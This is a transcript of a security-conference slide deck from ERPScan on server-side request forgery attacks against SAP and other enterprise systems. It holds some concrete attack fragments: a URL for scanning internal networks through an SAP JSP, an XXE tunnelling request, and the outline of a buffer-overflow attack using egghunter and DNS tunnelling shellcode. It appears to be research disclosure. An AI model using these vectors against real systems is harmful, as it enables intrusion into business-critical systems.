Invest in security - ERPScan • ssrfsocks by iamultra: a tool for ERPScan's vulnerability in...
TRANSCRIPT
-
Invest in security to secure investments
SSRF VS. BUSINESS-CRITICAL APPLICATIONS. PART 2: NEW VECTORS AND CONNECT-BACK ATTACKS
Alexander Polyakov CTO at ERPScan
-
Alexander Polyakov
Business application security expert
-
ERPScan
Leading SAP AG partner in the field of discovering security vulnerabilities by the number of found vulnerabilities
Developers of ERPScan Security Scanner for SAP
Leader by the number of acknowledgements from SAP ( >60 )
Invited to talk at more than 30 key security conferences worldwide (BlackHat (US/EU/DC/UAE), RSA, Defcon, HITB)
First to release software for NetWeaver J2EE platform assessment
Research team with experience in different areas of security, from ERP and web security to mobile, embedded devices, and critical infrastructure, accumulating their knowledge in SAP research.
Conducted workshops for SAP
-
Agenda
Enterprise applications
SSRF: history, types
SSRF proxy attacks: example of attacking SAP with SSRF
SSRF connect-back attacks: examples
XXE Scanner
Conclusion
-
Enterprise applications: Definitions
Business software is generally any software that helps a business to increase its efficiency or measure its performance
Small (MS Office)
Medium (CRM, Shops)
Enterprise (ERP, BW)
-
Why are they critical?
Any information an attacker might want, be it a cybercriminal, industrial spy or competitor, is stored in corporate ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. Industrial espionage, sabotage, and fraud or insider embezzlement may be very effective if targeted at the victim's ERP system, and they can cause significant damage to the business.
-
Business-critical systems architecture
Located in a secure subnetwork
Secured by firewalls
Monitored by IDS systems
Regularly patched
-
Noahhh
-
But let's assume that they are, because it will be much more interesting to attack them
-
Secure corporate network
The Internet
Industrial network
ERP network
Corporate network
-
But wait. There must be some links!
-
Real corporate network
The Internet
Industrial network
ERP network
Corporate network
-
And attackers can use them!
-
Corporate network attack scenario
The Internet
Industrial network
ERP network
Corporate network
-
But how?
-
SSRF History: the beginning
SSRF: Server Side Request Forgery.
An attack which was discussed in 2008 with very little information about theory and practical examples.
Like any new term, SSRF doesn't show us something completely new like a new type of vulnerability. SSRF-style attacks were known before.
-
SSRF History: Basics
We send Packet A to Service A
Service A initiates Packet B to service B
Services can be on the same host or on different hosts
We can manipulate some fields of packet B within packet A
Various SSRF attacks depend on how many fields we can control in packet B
Packet A
Packet B
-
SSRF history
Deral Heiland, Shmoocon 2008
Web Portals Gateway To Information Or A Hole In Our Perimeter Defenses
Spiderlabs 2012
http://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.html
Vorontsov 2012
SSRF via XXE http://2012.caro.org/presentations/attacks-on-large-modern-web-applications
ERPScan (Polyakov, Chastuchin) - SSRF vs business critical applications (Gopher protocol), August 2012
http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdf
ssrfsocks by iamultra: a tool for ERPScan's vulnerability in Gopher, August 2012
https://github.com/iamultra/ssrfsocks
Less Known Web App Vulnerabilities: Real World Examples (from ERPScan paper), October 2012
ERPScan - Gopher SSRF in JVM advisory, October 2012 http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/
ERPScan (Polyakov) - SSRF 2.0 http://erpscan.com/category/publications/
New research will be published at ZeroNights http://2012.zeronights.org/
-
Ideal SSRF
The idea is to find victim server interfaces that will allow sending packets initiated by the victim server to the localhost interface of the victim server or to another server secured by a firewall from outside. Ideally, this interface:
Must allow sending any packet to any host and any port
Must be accessed remotely without authentication
-
Why?
In this research, we wanted to :
Collect the information about SSRF attacks
Categorize them
Show examples of SSRF attacks
Show new potential and real SSRF vectors
-
SSRF
Trusted SSRF
Remote SSRF: Simple, Partial, Full
Local SSRF
SSRF proxy attack
SSRF back connect
SSRF counter attack
-
SSRF proxy attack
Secure network
Corporate network
(Figure labels: Packet A, Packet B)
-
SSRF back connect attack
(Figure labels: Packet A, Packet B, Packet C)
-
SSRF proxy attacks
Trusted SSRF (Can forge requests to remote services but only to predefined ones)
Remote SSRF (Can forge requests to any remote IP and port)
Simple Remote SSRF (No control on app level)
Partial Remote SSRF (Control in some fields of app level)
Full Remote SSRF (Control on app level)
-
Exploiting SSRF
For every SSRF attack, there must be at least 2 vulnerabilities to successfully trigger the attack:
First vulnerability:
Functionality to create/use links (for trusted SSRF)
Functionality in some service on Server A which allows us to send remote packets (for other types of SSRF)
Second vulnerability:
Insecure link (for trusted SSRF)
Vuln. in service on server B (for remote SSRF)
Vuln. in localhost service on server A (for local SSRF)
Vuln. in client app. on server A (for back-connect SSRF)
-
Trusted SSRF
Trusted SSRF in Oracle
SELECT * FROM myTable@HostB
EXECUTE Schema.Package.Procedure('Parameter')@HostB
Trusted SSRF in MSSQL
select * from openquery(HostB, 'select @@version')
Trusted SSRF in SAP NetWeaver
SM59 transaction
Also Lotus Domino and others
Not so interesting
-
First vulnerability (functionality on Server A)
Unusual calls
Multiprotocol calls (URI)
In engines (XML)
In applications
UNC calls
HTTP calls
FTP calls
LDAP calls
SSH calls
Other calls
-
Functionality on server A: Unusual calls
Remote port scan
SAP NetWeaver wsnavigator (sapnote 1394544,871394)
SAP NetWeaver ipcpricing (sapnote 1545883)
SAP BusinessObjects viewrpt (sapnote 1583610)
Remote password bruteforce
SAP NetWeaver (NDA)
Other
Information disclosure by testing if a file or a directory exists
Timing attacks
Etc.
Very application-specific. Can be very interesting
-
Example of unusual calls
It is possible to scan the internal network from the Internet
Authentication is not required
SAP NetWeaver J2EE engine is vulnerable
/ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=31337&dispatcher=&targetClient=&view=
-
Port scan via ipcpricing JSP
Host is not alive
Port closed
HTTP port
SAP port
-
Multiprotocol calls (in XML)
XML seems to be the new TCP.
Almost all big projects use XML-based data transfer.
There are a lot of XML-based protocols with different options to call external resources and thus conduct SSRF attacks.
There is at least one element type which fits almost all XML-based schemes. The type is: xsd:anyURI.
URIs also encompass URLs of other schemes (e.g., FTP, gopher, telnet), as well as URNs.
Popular URIs: http:// ftp:// telnet:// ..
-
Multiprotocol calls in XML
XML: XML External Entity, XSD definition
XML Encryption
XML Signature
WS-Policy (from WS-Security)
WS-Addressing
XBRL
ODATA (edmx)
ODATA External Entity
BPEL
STRATML
Other
-
XML Encryption
1.
2.
3.
4.
Successfully Tested
-
XML Signature
1.
Successfully Tested
-
WS-Addressing
1. http://ServerB/
2. http://ServerB/
Successfully Tested (0-day)
-
WS-Policy
1.
Not Tested
-
WS-Security
1.
-
WS-Federation
1.
2. http://ServerB/
3. http://ServerB/
4. http://ServerB/
Not Tested
-
XBRL
1.
2.
Not Tested
-
ODATA (edmx)
The edmx:Reference element specifies external entity models referenced by this EDMX. Referenced models are available in their entirety to referencing models. All entity types, complex types and other named elements in a referenced model can be accessed from a referencing model.
http://www.odata.org/media/30002/OData%20CSDL%20Definition.html
No examples of edmx in the wild (new protocol)
-
ODATA
1.
2.
Still no products for testing (0-day)
-
STRATML
1. http://ServerB/
Not tested
-
SOAP
SoapAction?
No Examples
-
Multiprotocol Calls in Applications
-
Multiprotocol calls
Not so usual, but a potentially big area
Oracle Database
UTL_TCP
-
UNC calls: threats
Sure, you can call a UNC path if you have a universal URI
But if there is no universal engine, you can search for UNC
UNC calls can be used for:
conducting SMBRelay attack
reading files from shared folders (open or trusted)
other vectors which will be discussed later.
Check SMBRelay bible posts from http://erpscan.com/?s=SMBRelay+Bible&x=0&y=0
-
UNC calls: applications
SAP NetWeaver
From SAP webservices (sapnote 1503579,1498575)
From RFC functions (sapnote 1554030)
From SAP transactions, reports (sapnote 1583286)
Oracle Database
Listener
Database commands such as ctxsys.context
MsSQL Database
MySQL Database
FTP servers
IBM Lotus Domino controller
VMWare
Anything that uses XML engine
And much more
-
HTTP calls: threats
Sure, you can call an HTTP path if you have a universal URI
But if there is no universal engine, you can search for HTTP
HTTP calls can be used for conducting a wide range of attacks on systems which are in the same network as Server A
DoS
Info disclosure
Unauthorized access (like invoker servlets)
Bruteforcing (users/directories/pages)
Fingerprinting
etc
Examples of HTTP attacks are beyond the current research
-
HTTP calls: applications
SAP NetWeaver
Transactions
Reports
RFC commands
Portal portlets
Portal links
Oracle Database
UTL_HTTP
MsSQL Database
PostgreSQL Database
Anything that uses XML engine
And much more
-
FTP calls threats
Sure, you can call an FTP path if you have a universal URI
FTP is usually possible whenever HTTP is possible
But if there is no universal engine, you can search for FTP
FTP calls can be used to conduct a wide range of attacks on systems which are in the same network as Server A
DoS
Info disclosure
Unauthorized access (like invoker servlets)
Bruteforcing (users/directories/pages)
Fingerprinting
etc.
Examples of FTP attacks are beyond the current research
-
FTP calls: applications
SAP NetWeaver
Transactions
Reports
RFC commands
Oracle Database
UTL_HTTP
PostgreSQL Database
Anything that uses XML engine
And much more
-
Other calls
ldap:// - Bruteforce logins, Information disclosure
jar:// - Information disclosure
mailto:
ssh2:// - Bruteforce logins, RCE?
gopher:// - XXE Tunneling
Just the most popular ones
-
Exploiting Gopher (Example)
-
XXE Tunneling (Example)
Server B (ERP, HR, BW etc.)
Server A (Portal or XI)
192.168.0.1
172.16.0.1
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: 192.168.0.1:8000
-
XXE Tunneling to Buffer Overflow (Example)
A buffer overflow vulnerability found by Virtual Forge in the ABAP Kernel (fixed in sapnote 1487330)
Hard to exploit because it requires calling an RFC function which calls Kernel function
But even such a complex attack can be exploited
Get ready for the hardcore
-
XXE Tunneling to Buffer Overflow (Hint 1)
Shellcode size is limited to 255 bytes (name parameter)
As we don't have a direct connection to the Internet from the vulnerable system, we want to use DNS tunneling shellcode to connect back
But the XML engine saves some XML data in RWX memory
So we can use egghunter
Any shellcode can be uploaded
-
XXE Tunneling to Buffer Overflow: Packet B
POST /sap/bc/soap/rfc?sap-client=000 HTTP/1.1
Authorization: Basic U1FQKjowMjA3NTk3==
Host: company.com:80
User-Agent: ERPSCAN Pentesting tool v 0.2
Content-Type: text/xml; charset=utf-8
Cookie: sap-client=000
Content-Length: 2271